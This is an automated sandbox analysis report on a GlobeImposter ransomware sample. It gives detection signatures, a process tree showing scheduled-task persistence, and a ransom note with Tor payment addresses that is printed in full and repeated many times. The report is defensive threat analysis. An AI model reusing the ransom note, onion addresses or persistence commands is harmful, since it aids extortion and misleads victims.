Loading ...

Play interactive tourEdit tour

Windows Analysis Report Mm7Yq5V7Lu

Overview

General Information

Sample Name:Mm7Yq5V7Lu (renamed file extension from none to exe)
Analysis ID:548760
MD5:2f121145ea11b36f9ade0cb8f319e40a
SHA1:d68049989ce98f71f6a562e439f6b6f0a165f003
SHA256:59e0ab333060b4e510db5d36d87f0fe267ab66b0881955649b06d91d6dd2d486
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

Globeimposter
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Globeimposter Ransomware
Yara detected AntiVM3
Found ransom note / readme
Multi AV Scanner detection for dropped file
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Mm7Yq5V7Lu.exe (PID: 3024 cmdline: "C:\Users\user\Desktop\Mm7Yq5V7Lu.exe" MD5: 2F121145EA11B36F9ADE0CB8F319E40A)
    • schtasks.exe (PID: 6936 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp3BD7.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Mm7Yq5V7Lu.exe (PID: 6252 cmdline: {path} MD5: 2F121145EA11B36F9ADE0CB8F319E40A)
  • Mm7Yq5V7Lu.exe (PID: 6980 cmdline: "C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe" MD5: 2F121145EA11B36F9ADE0CB8F319E40A)
    • schtasks.exe (PID: 6664 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp9002.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Mm7Yq5V7Lu.exe (PID: 4528 cmdline: {path} MD5: 2F121145EA11B36F9ADE0CB8F319E40A)
    • Mm7Yq5V7Lu.exe (PID: 6796 cmdline: {path} MD5: 2F121145EA11B36F9ADE0CB8F319E40A)
  • Mm7Yq5V7Lu.exe (PID: 6856 cmdline: "C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe" MD5: 2F121145EA11B36F9ADE0CB8F319E40A)
    • schtasks.exe (PID: 4348 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmpB7BE.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Mm7Yq5V7Lu.exe (PID: 6416 cmdline: {path} MD5: 2F121145EA11B36F9ADE0CB8F319E40A)
    • Mm7Yq5V7Lu.exe (PID: 6088 cmdline: {path} MD5: 2F121145EA11B36F9ADE0CB8F319E40A)
    • Mm7Yq5V7Lu.exe (PID: 3092 cmdline: {path} MD5: 2F121145EA11B36F9ADE0CB8F319E40A)
    • Mm7Yq5V7Lu.exe (PID: 5664 cmdline: {path} MD5: 2F121145EA11B36F9ADE0CB8F319E40A)
  • EXCEL.EXE (PID: 1964 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /dde MD5: 5D6638F2C8F8571C593999C58866007E)
  • notepad.exe (PID: 3176 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\read-me.txt MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • cleanup

Malware Configuration

Threatname: GlobeImposter

{"Ransom Note": "All your files are Encrypted!\r\nFor data recovery needs decryptor.\r\nHow to buy decryptor:\r\n----------------------------------------------------------------------------------------\r\n\r\n| 1. Download Tor browser - https://www.torproject.org/ and install it.\r\n\r\n| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV\r\n               \r\n| 3. Create Ticket\r\n\r\n----------------------------------------------------------------------------------------\r\n\r\nNote! This link is available via Tor Browser only.\r\n\r\n------------------------------------------------------------\r\nor\r\nhttp://helpqvrg3cc5mvb3.onion/\r\n\r\nYour ID\r\n\r\n\u0000\u0000\u000067 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A\nA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB\nA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40\nE7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66\nC0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82\n5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C\n92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D\n12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0\n72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D\n30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0\nE2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2\nAC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C\n5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10\n6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32\nE4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5\n79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74\n"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\AccountPictures\read-me.txtJoeSecurity_GlobeimposterYara detected Globeimposter RansomwareJoe Security
    C:\Users\Public\AccountPictures\read-me.txtJoeSecurity_GlobeimposterYara detected Globeimposter RansomwareJoe Security
      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txtJoeSecurity_GlobeimposterYara detected Globeimposter RansomwareJoe Security
        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\read-me.txtJoeSecurity_GlobeimposterYara detected Globeimposter RansomwareJoe Security
          C:\Users\Public\AccountPictures\read-me.txtJoeSecurity_GlobeimposterYara detected Globeimposter RansomwareJoe Security
            Click to see the 48 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000018.00000002.590021238.0000022DB7FD5000.00000004.00000020.sdmpJoeSecurity_GlobeimposterYara detected Globeimposter RansomwareJoe Security
              Process Memory Space: Mm7Yq5V7Lu.exe PID: 3024JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                Process Memory Space: Mm7Yq5V7Lu.exe PID: 6980JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                  Process Memory Space: Mm7Yq5V7Lu.exe PID: 6856JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                    Process Memory Space: notepad.exe PID: 3176JoeSecurity_GlobeimposterYara detected Globeimposter RansomwareJoe Security

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicius Add Task From User AppData TempShow sources
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp3BD7.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp3BD7.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Mm7Yq5V7Lu.exe" , ParentImage: C:\Users\user\Desktop\Mm7Yq5V7Lu.exe, ParentProcessId: 3024, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jVYbanglCI" /XML "C:\Users\user\AppData\Local\Temp\tmp3BD7.tmp, ProcessId: 6936

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: read-me.txt.7.drMalware Configuration Extractor: GlobeImposter {"Ransom Note": "All your files are Encrypted!\r\nFor data recovery needs decryptor.\r\nHow to buy decryptor:\r\n----------------------------------------------------------------------------------------\r\n\r\n| 1. Download Tor browser - https://www.torproject.org/ and install it.\r\n\r\n| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV\r\n \r\n| 3. Create Ticket\r\n\r\n----------------------------------------------------------------------------------------\r\n\r\nNote! This link is available via Tor Browser only.\r\n\r\n------------------------------------------------------------\r\nor\r\nhttp://helpqvrg3cc5mvb3.onion/\r\n\r\nYour ID\r\n\r\n\u0000\u0000\u000067 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A\nA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB\nA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40\nE7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66\nC0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82\n5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C\n92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D\n12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0\n72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D\n30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0\nE2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2\nAC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C\n5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10\n6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32\nE4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5\n79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74\n"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Mm7Yq5V7Lu.exeVirustotal: Detection: 30%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeReversingLabs: Detection: 34%
                      Machine Learning detection for sampleShow sources
                      Source: Mm7Yq5V7Lu.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_00406BCE CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,7_2_00406BCE
                      Source: Mm7Yq5V7Lu.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: Mm7Yq5V7Lu.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeCode function: 7_2_004096D7 _chkstk,lstrcatW,lstrcmpiW,lstrlenW,lstrcatW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcatW,lstrcatW,lstrcmpiW,lstrcmpiW,PathFindFileNameW,lstrcmpiW,SetFileAttributesW,lstrcpyW,lstrcatW,MoveFileExW,FindNextFileW,FindClose,7_2_004096D7
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile opened: C:\Users\user\Start Menu\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile opened: C:\Users\user\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnkJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile opened: C:\Users\user\Start Menu\Programs\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile opened: C:\Users\user\Start Menu\Programs\Windows PowerShell\Windows PowerShell ISE (x86).lnkJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Mm7Yq5V7Lu.exeFile opened: C:\Users\user\Start Menu\Programs\Windows PowerShell\desktop.iniJump to behavior

                      Networking:

                      barindex
                      Found Tor onion addressShow sources
                      Source: notepad.exe, 00000018.00000002.590021238.0000022DB7FD5000.00000004.00000020.sdmpString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: notepad.exe, 00000018.00000002.590021238.0000022DB7FD5000.00000004.00000020.sdmpString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt27.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt27.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt6.23.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt6.23.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt7.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt7.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt4.23.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt4.23.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt24.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt24.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt28.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt28.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt4.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt4.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt1.15.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt1.15.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt30.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt30.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt13.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt13.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt14.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt14.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt23.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt23.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt11.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt11.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt5.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt5.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt25.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt25.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt9.15.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt9.15.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt2.23.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt2.23.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt0.23.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt0.23.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt3.15.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt3.15.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt20.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt20.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt16.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt16.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt5.15.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt5.15.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt1.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt1.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt10.15.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt10.15.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt8.15.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt8.15.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt6.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt6.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt18.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt18.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt26.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt26.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt0.15.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt0.15.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt7.15.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt7.15.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt15.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt15.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt6.15.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt6.15.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt1.23.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt1.23.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt3.23.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt3.23.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt5.23.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt5.23.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt.23.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt.23.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt2.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt2.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt8.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt8.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt.15.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt.15.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt22.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt22.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt12.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt12.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt7.23.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt7.23.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt0.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt0.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt10.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt10.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt9.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt9.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt29.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt29.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt3.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt3.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt21.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt21.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt4.15.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt4.15.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt19.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt19.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt2.15.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt2.15.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: read-me.txt17.7.drString found in binary or memory: | 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: read-me.txt17.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000003.302536100.00000000012FD000.00000004.00000001.sdmpString found in binary or memory: http://en.w
